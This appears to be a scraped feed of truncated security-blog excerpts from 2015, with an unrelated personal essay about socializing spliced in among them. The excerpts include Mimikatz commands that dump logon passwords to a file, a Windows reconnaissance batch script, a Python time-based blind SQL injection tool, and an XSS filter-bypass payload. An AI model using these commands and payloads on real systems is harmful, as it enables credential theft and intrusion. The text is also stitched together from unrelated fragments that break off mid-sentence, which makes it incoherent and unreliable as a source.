An error-based blind injection scenario

An error-based blind injection scenario MayIKissYou | 2015-11-06 16:17 1: Background Recently a big guy sent me a link, saying it had an injection but that some keywords were filtered, so part of the data could not be pulled out, and asked me to take a look. So I looked into it

Mimikatz Usage Tips

Mimikatz Usage Tips Evi1cg (feeling cute) | 2015-09-17 16:42
1. Log Mimikatz output: C:\>mimikatz.exe "privilege::debug" "log sekurlsa::logonpasswords full" exit && dir
2. Redirect the output to a local file: C:\>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit >> log.txt
3. Transfer the output

A batch script for collecting Windows system information

@echo off
echo --------------------------------------------------------------------------------------------------- >> System_Details.txt
echo System Information >> System_Details.txt
echo --------------------------------------------------------------------------------------------------- >> System_Details.txt
rem append (>>) rather than overwrite (>), otherwise the header lines above are lost
systeminfo | findstr /B /C:"OS" >> System_Details.txt
echo --------------------------------------------------------------------------------------------------- >> System_Details.txt
echo Hostname >> System_Details.txt
echo --------------------------------------------------------------------------------------------------- >> System_Details.txt
hostname >> System_Details.txt
echo --------------------------------------------------------------------------------------------------- >> System_Details.txt
echo Users >> System_Details.txt
echo --------------------------------------------------------------------------------------------------- >> System_Details.txt
net users >> System_Details.txt
echo --------------------------------------------------------------------------------------------------- >> System_Details.txt
echo Route table >> System_Details.txt
echo --------------------------------------------------------------------------------------------------- >> System_Details.txt
route print >> System_Details.txt
echo

Give up useless socializing

That year I came to Beijing alone, carrying one sentence my father had told me: make more friends. So in university I loved socializing, joined three clubs, and showed up to tag along whenever there was an event. I was happy to leave others

Python time-based injection

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# time-based (delay) injection tool
import urllib2
import time
import socket
import threading
import requests


class my_threading(threading.Thread):
    def __init__(self, str, x):
        threading.Thread.__init__(self)
        self.str = str
        self.x = x

    def run(self):
        global res
        x = self.x
        j = self.str
        url = "http://localhost/demo/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29," + str(j) + ",1%29%29,sleep%282%29,0%29%23"
        html = request(url)
        verify = 'timeout'
        if verify not in html:
            res[str(j)] = 0
        #print 1

Bypassing Chrome's Anti-XSS Filter (bypassing the Google Chrome XSS filter)

Hi! Just wanted to share my finding. I’ve found a way to bypass Chrome’s anti-xss filter. This bypass is universal, and it defeats Chrome’s XSSAuditor in all cases! Description XSS attacks occur when one website injects JavaScript code into otherwise legitimate requests to another website. The injected script generally attempts to access privileged

A brief look at redirects in code

A brief look at redirects in code he1renyagao (github.com/NaihTool) | 2015-06-21 16:40 Today, while reviewing my old bug-hunting approaches, I came across the SSRF issue and suddenly had an idea about using a 302 redirect to bypass that check, so I tested it myself.

New IE mutation vector

I was messing around with a filter that didn't correctly filter attribute names and allowed a blank one, which enabled me to bypass it. I thought maybe IE had similar issues when rewriting innerHTML. Yes, it does, of course. The filter bypass worked like this: <img ="><script>alert(1)</script>"> The filter incorrectly assumed it was still inside an attribute and therefore allowed raw HTML to be injected, and the various browsers treat it as an invalid attribute and execute the script.